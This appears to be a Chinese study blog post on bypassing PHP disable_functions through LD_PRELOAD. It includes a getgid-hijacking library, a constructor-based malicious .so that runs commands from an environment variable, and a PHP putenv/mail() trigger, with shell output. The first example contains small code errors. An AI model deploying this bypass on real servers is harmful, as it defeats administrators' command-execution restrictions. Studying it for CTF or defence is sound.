当前位置: 首页 > article >正文

LD_PRELOAD 绕过 disable_function 学习

article 2025/2/26 1:02:45

借助这位师傅的文章来学习通过LD_PRELOAD来绕过disable_function的原理

【PHP绕过】LD_PRELOAD bypass disable_functions_phpid绕过-CSDN博客

感谢这位师傅的贡献

介绍

静态链接:

(1)举个情景来帮助理解: 假设你要搬家,但家具不换,全部打包带走。

(2)优点:搬到新家后,直接开箱即用,不依赖外部资源(不去邻居家借洗衣机)

(3)缺点:搬家时行李又多又重(程序体积大),而且如果家具升级(比如库更新),得重新买一套再搬一次(重新编译程序)

(4)在编译时,所有依赖的库代码可直接嵌入到可执行文件中,程序独立运行,但体积较大,且库更新需重新编译程序

动态链接:

(1)举个情景来帮助理解:这次搬家,只带必需品,其他东西(比如工具书,电器)选择去附近的图书馆或共享商店按需借用。需要时随时去拿,用完归还。

(2)优点:行李轻便(程序体积小),多个家庭共享同一本书或工具(多个程序共享一个库),资源更新也方便(图书馆换新书)

(3)缺点:可能出现图书馆关门(库文件缺失)
(4)编译时不进行函数库的链接,而是在程序运行时才动态地载入所需的函数库。这样使得可执行文件体积较小,并且多个程序可以共享相同的动态库,节省内存资源。动态链接提高了程序的灵活性和可维护性。

再来了解一下什么是LD_PRELOAD

LD_PRELOAD 是linux/Unix系统中一个强大的环境变量,允许用户在程序运行时优先加载自定义的共享库,从而覆盖或替换标准库中的函数。

 也就是说,通过LD_PRELOAD指定的共享库会在程序启动时最先加载,其定义的函数会覆盖后续加载的同名函数。

用法

那么其利用方法很明显了,如果我们能在我们的自定义库中写入一些与”原本函数“ 作用不同 但同名 的函数,就能成功覆盖掉原本函数的用法了。

跟着师傅的例子再来了解一下

劫持getgid

看看id命令在执行过程中会用到的函数表

┌──(root㉿kali)-[~/Desktop]
└─# readelf -Ws /usr/bin/id     

Symbol table '.dynsym' contains 74 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND endgrent@GLIBC_2.2.5 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (2)

 而这些函数都是可以被我们覆盖的,现在观察一下getgid函数的内容,输入 man getgid

 构造一个与之原型相同的函数

#include<stdlib.h>
#include<unistd.h>
#include<sys.types.h>

gid_t getgid(void){
    unsetenv("LD_PRELOAD");
    // 使用unsetenv删除原有的共享库
    system("'echo 'I hacked U!!\n' > successful");
}

运行指令

gcc --shared -fPIC rob.c -o rob.so

 

 接下来,载入这个库并运行id命令

┌──(root㉿kali)-[~/test]
└─# LD_PRELOAD=./rob.so id
uid=0(root) gid=0(root) groups=0(root)

 得到successful文件

这就是一次劫持操作

绕过disable_function

当题目中有disable_function的限制时,会导致我们拿到的shell都是空的,这时就要想办法绕过disable_function。其实我们要实现的操作主要是执行命令,可以使用LD_PRELOAD环境变量强制该程序优先加载一个恶意共享库(.so文件),覆盖其调用的标准库函数(如getuid()),从而执行任意代码

编写恶意文件

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>

__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加载库的同时执行函数
    unsetenv("LD_PRELOAD");
    system("ls > hackfile");
    // 用于php
}

 运行指令

┌──(root㉿kali)-[~/test]
└─# gcc --shared -fPIC hack.c -o hack.so

编写hack.php文件

<?php
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

此时再执行,就可以成功劫持了

┌──(root㉿kali)-[~/test]
└─# php hack.php
sh: 1: /usr/sbin/sendmail: not found
1
hack.c
hack.php
hack.so
hackfile
rob.c
rob.so
successful

 同时,这位师傅还给出了手动输入参数的做法,真的很厉害

将hack.c改为:

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>

__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加载库的同时执行函数
    unsetenv("LD_PRELOAD");
    char *cmd=getenv("MY_CMD");
    system(cmd);
}

再将hack.php改为:

<?php
$a=$argv[1];
$cmd="$a > hackfile";
@putenv("MY_CMD=".$cmd);
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

 就可以这样运行代码了:

┌──(root㉿kali)-[~/test]
└─# php hack.php id
sh: 1: /usr/sbin/sendmail: not found
uid=0(root) gid=0(root) groups=0(root)

前几天看了一篇推文,发觉对漏洞和工具的原理还是要去理解。感谢师傅提供的思路和方法!


http://www.kler.cn/a/561056.html

相关文章:

  • JavaWeb-在idea中配置Servlet项目
  • 为什么要将PDF转换为CSV?CSV是Excel吗?
  • HTML+JS+CSS 鼠标上下移动页面(非滚动条)
  • 异步联邦学习的动态隐私保护框架:重构边缘智能的数据安全边界
  • C#中开发OCR应用时,以下是一些推荐的开源库和工具
  • Android 老项目 jcenter 库失效
  • springBoot统一响应类型2.0版本
  • 力扣3102.最小化曼哈顿距离
  • vue 3D 翻页效果
  • 使用 金南瓜EAP库 进行 二次开发与半导体厂家进行通讯源码
  • 基于云的物联网系统用于实时有害藻华监测:通过MQTT和REST API无缝集成ThingsBoard
  • DeepSeek开源FlashMLA:颠覆大模型训练效率的新一代技术解析
  • 蓝桥杯第十六届嵌入式模拟编程题解析
  • 2 算法1-2 明明的随机数
  • redis---字符串SDS(简单动态字符串)底层结构
  • 【无人集群系列---无人机集群编队算法】
  • 免填邀请码工具:赋能六大核心场景,重构App增长新模型
  • 故障诊断 | DCS差异创意搜索算法优化CatBoost故障诊断(MatlabPython)
  • 微软量子芯片引领人工智能革命,开启计算新纪元
  • 算法日记27:完全背包(DFS->记忆化搜索->倒叙DP->顺序DP->空间优化)